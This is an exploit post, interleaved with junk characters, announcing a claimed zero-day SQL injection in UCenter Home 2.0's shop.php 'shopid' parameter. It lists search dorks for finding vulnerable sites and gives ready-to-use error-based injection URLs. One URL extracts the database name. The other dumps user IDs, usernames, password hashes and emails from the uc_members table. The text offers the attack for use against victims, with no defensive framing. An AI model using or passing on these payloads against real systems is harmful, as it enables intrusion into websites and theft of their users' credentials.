0 {6 ]& I3 \/ ~: h
__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__ : U& R' l* m/ M' L" j! a4 X1 D
8 n3 \) p3 U* K8 U, [5 A/ t6 L' S8 n . d9 b8 ?' j& {" T! r! f: c# i2 E$ m- B+ a
5 j, x; Y) s- C# l" K
*/ Author : KnocKout ! @9 l' k( V$ D: c
8 s* M9 z7 Y/ ]% C8 t
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers 5 P0 V z) f b+ T: Z9 t' I/ m2 ~
/ L. \% ~% u" ?) n0 ~1 F H; s- K
*/ Contact: knockoutr@msn.com ( |/ i5 y4 Q, C. \4 a
/ q( s& g6 j: x% K
*/ Cyber-Warrior.org/CWKnocKout : D. g2 P* ^- M; |
) ^5 v1 O3 f6 r! d8 m__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
" H+ H, V; N) u- T9 P9 N0 T3 G+ A8 f; A/ i3 d0 @- ]" g
Script : UCenter Home
" [3 W. Q+ G! D& L5 l$ l& E1 |" E* @
Version : 2.0 5 o! u) w% M- r
8 X3 S9 p- t. u4 W/ LScript HomePage : http://u.discuz.net/ 5 B# O2 R7 J( U" H
1 t) z# w7 @! h8 m2 M& g! ^
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
# \# [6 R8 y/ F7 h; p1 j* @5 N# S! s/ x6 L4 f3 D+ f% S
Dork : Powered by UCenter inurl:shop.php?ac=view % n( y6 [ Z* I, q7 Y/ w/ k
/ @: M1 z" F( R
Dork 2 : inurl:shop.php?ac=view&shopid=
: l! c% C$ Z q+ V
. n( V7 k" I# G2 N/ D) ^* J. T__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
- q. {9 ~6 g: T+ l$ A V
0 T1 o, z9 [; g* R) D8 xVuln file : Shop.php
# ^. H6 i9 U+ U, G
2 M- U. K, u8 r0 y, Lvalue's : (?)ac=view&shopid= ! v$ S& i1 t0 c/ [- G+ U" F& t, k
! K! m2 n0 u! ~0 N/ P- M1 ]Vulnerable Style : SQL Injection (MySQL Error Based) 4 r4 J% X! x* ]7 u* [
; n3 f! f" e6 b7 g# g
Need Metarials : Hex Conversion
5 u; C. a5 L7 ]; a6 ^7 x A p/ S5 X* g3 A
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== + f4 n. }* i) R. t4 R
1 c \9 y2 a5 c e, R- u$ o7 B6 R( f
Your Need victim Database name.
2 }3 m9 s# P- |" v
0 m1 N. }. ~$ l' `0 C4 B( bfor Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 7 y Y# R6 U3 i$ y# g. ?
h7 H5 ?" c0 q5 b C..
8 @2 y! a! e3 y1 g+ g ~
* V9 }) S& o" k, HDB : Okey.
" v& K) m1 i3 j4 G( W$ j0 W/ H1 l: ?+ `9 G: T& a9 U* Z9 j* |
your edit DB `[TARGET DB NAME]`
. `5 n" J" ^" D5 J4 D/ U( S9 F$ `7 |3 n) G, y) @ u
Example : 'hiwir1_ucenter' 1 _9 q4 e) J1 f2 _% A; l
& G4 x$ o v1 ^4 B
Edit : Okey. 9 G! k/ f# D& q% R' d% t
4 ?* p, R3 Z/ P% m x3 i; r {
Your use Hex conversion. And edit Your SQL Injection Exploit..
3 W% `2 E0 G; B- M7 }
$ a, N6 x+ {+ e
7 `. i% L4 H" d n" X! x/ c" f- c1 S+ o
Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
: o2 l% U% f. B% {! [ |